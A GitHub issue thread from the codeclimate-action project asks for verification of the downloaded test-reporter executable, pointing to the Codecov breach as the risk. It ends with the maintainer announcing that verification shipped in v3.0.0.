Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

Verify the downloaded executable #331

Closed
mmatheson opened this issue Apr 15, 2021 · 4 comments · Fixed by #429
Closed

Verify the downloaded executable #331

mmatheson opened this issue Apr 15, 2021 · 4 comments · Fixed by #429
Assignees
@paambaati
Labels
bug Something isn't working

Comments

@mmatheson
Copy link

Describe the bug
No verification of the downloaded executable test-reporter is done. This can lead to vulnerabilities like CodeCov recently experienced: https://about.codecov.io/security-update/

Version of codeclimate-action you're using
v2.5.7

Example links

Additional context
https://about.codecov.io/security-update/
@mmatheson mmatheson added the bug Something isn't working label Apr 15, 2021
@beeb
Copy link

beeb commented Jun 11, 2021

This is really paramount!

@ghost
Copy link

ghost commented Sep 13, 2021

The test-reporter repo was updated with instructions on how to validate the executable

https://github.com/codeclimate/test-reporter#verifying-binaries

@paambaati paambaati mentioned this issue Sep 29, 2021
Merged
@paambaati
Copy link
Owner

This feature has now landed in v3.0.0!

@ghost
Copy link

ghost commented Sep 30, 2021

Confirmed working! Thanks a bunch!

# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees

@paambaati paambaati

Labels
bug Something isn't working
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

feat: verify reporter download paambaati/codeclimate-action
3 participants
@beeb @mmatheson @paambaati